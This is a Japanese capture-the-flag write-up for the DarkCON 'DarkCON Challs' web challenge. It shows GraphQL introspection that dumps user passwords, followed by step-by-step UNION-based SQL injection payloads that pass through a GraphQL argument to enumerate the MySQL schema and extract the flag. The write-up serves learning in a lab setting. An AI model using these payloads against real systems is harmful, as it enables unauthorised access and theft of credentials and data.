以下が認証プロセス。 GraphQLが使われているので、とりあえずいつもの抜き出しを行う。
function auth() { var username = document.getElementById("Username").value; var password = document.getElementById("Password").value; var head = btoa(username + ':' + password); $(document).ready(function() { $.post("graphql", { "query": "mutation{login(username:\"" + username + "\",password:\"" + password + "\")}" }, function(data, textStatus) { if (data.data.login == "Success") { document.cookie = "auth=" + head; window.location = '/dashboard' } else { alert('Wrong creds') } ; }, "json"); }); } function yeet() { document.cookie = "auth=Z3Vlc3Q6a2FybWE5ODc0"; window.location = "/dashboard" }
mutation{login(username:"admin",password:"password")} query{Challs{}} -> Authorization Error query{allUsers{username password}} -> {"data":{"allUsers":[{"username":"guest","password":"karma9874"},{"username":"admin","password":"is_this_visible_to_you?"}]}} ok.
adminパスワードが抜けたので、とりあえずログインしてみる。 admin権限が得られたので、改めてGraphQLを操作してみる。
query{Challs{id title flag{chall_flag}}} -> {"id":"35","title":"DarkCON Challs","flag":{"chall_flag":"<REDACTED>"}
Try Harderか…
query{Challs{id title description category author points flag{chall_id chall_title chall_flag}}} -> {"id":"35","title":"DarkCON Challs","description":"\"A place where you can see all the challs of darkCON CTF using api but not the flag or can you @_@ ?\r\nPS :- Try to get the flag of this chall xD\"","category":"Web","author":"Karma","points":500,"flag":{"chall_id":"35","chall_title":"DarkCON Challs","chall_flag":"<REDACTED>"}}
んー…
query{hint(chall_id:"35"){chall_id chall_title take_hint}} -> 特に…
いや、SQLiか?
query{hint(chall_id:"x"){chall_id chall_title take_hint}} -> ER_BAD_FIELD_ERROR: Unknown column 'x' in 'where clause' query{hint(chall_id:"'"){chall_id chall_title take_hint}} ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
キタキタキタ。
query{hint(chall_id:"-1 union select 1,2,3"){chall_id chall_title take_hint}}
これで1,2,3と出力されるようになった。OK
query{hint(chall_id:"-1 union SELECT GROUP_CONCAT(distinct TABLE_SCHEMA),2,3 FROM INFORMATION_SCHEMA.TABLES"){chall_id chall_title take_hint}} -> darkcon,information_schema,mysql,performance_schema,sys query{hint(chall_id:"-1 union select GROUP_CONCAT(distinct table_name),2,3 from information_schema.tables where TABLE_SCHEMA='darkcon'"){chall_id chall_title take_hint}} -> challs,flags,hints,users query{hint(chall_id:"-1 union select GROUP_CONCAT(column_name),2,3 from information_schema.columns where table_name='challs'"){chall_id chall_title take_hint}} -> challs: id,category,title,description,author,points query{hint(chall_id:"-1 union select GROUP_CONCAT(column_name),2,3 from information_schema.columns where table_name='flags'"){chall_id chall_title take_hint}} -> flags: chall_id,chall_title,chall_flag query{hint(chall_id:"-1 union select GROUP_CONCAT(distinct chall_flag),2,3 from flags"){chall_id chall_title take_hint}} -> darkCON{fake_flag},darkCON{w0ww_y0u_re411y_f0und_m3}
提出できんかったけど、これはあってるやろ。 ok. darkCON{w0ww_y0u_re411y_f0und_m3}